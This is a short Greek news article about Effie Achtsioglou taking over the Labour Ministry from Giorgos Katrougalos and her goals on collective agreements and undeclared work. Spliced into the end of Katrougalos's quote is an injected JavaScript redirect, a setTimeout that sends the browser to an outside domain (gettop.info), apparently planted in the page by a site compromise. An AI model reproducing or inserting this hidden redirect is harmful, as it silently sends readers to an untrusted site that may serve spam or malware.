Αχτσιόγλου: Το ασφαλιστικό έκλεισε από την πρώτη αξιολόγηση

0
4

 

Το μεγάλο στοίχημα είναι η επιβολή της νομιμότητας στην αγορά εργασίας, υπογράμμισε η νέα υπουργός Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, Έφη Αχτσιόγλου κατά τη διάρκεια της τελετής παράδοσης-παραλαβής. Επίσης, ανέφερε ότι το ασφαλιστικό έκλεισε από την πρώτη αξιολόγηση.

Η νέα υπουργός είπε ότι το έργο της θα κινηθεί σε δύο άξονες: Τις αλλαγές των εργασιακών ώστε να κλείσει η β’ αξιολόγηση και την καθημερινότητα των πολιτών.

Σε σχέση με το πρώτο οι στόχοι που θέτει είναι η αποκατάσταση των συλλογικών συμβάσεων και η αποτροπή της περαιτέρω απορρύθμισης της αγοράς εργασίας. Όσον αφορά την καθημερινότητα των πολιτών η νέα υπουργός δεσμεύθηκε ότι θα ενισχύσει τους ελεγκτικούς μηχανισμούς ώστε να περιοριστεί η αδήλωτη, απλήρωτη ή και κακοπληρωμένη εργασία, που είναι από τα πιο σημαντικότερα προβλήματα στα χρόνια του μνημονίου.

Από την πλευρά του ο απερχόμενος υπουργός Εργασίας Γιώργος Κατρούγκαλος τόνισε πως «δεν θα υπήρχαν καλύτερα χέρια να παραδώσω αυτά τα βαριά καθήκοντα του υπουργείου«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here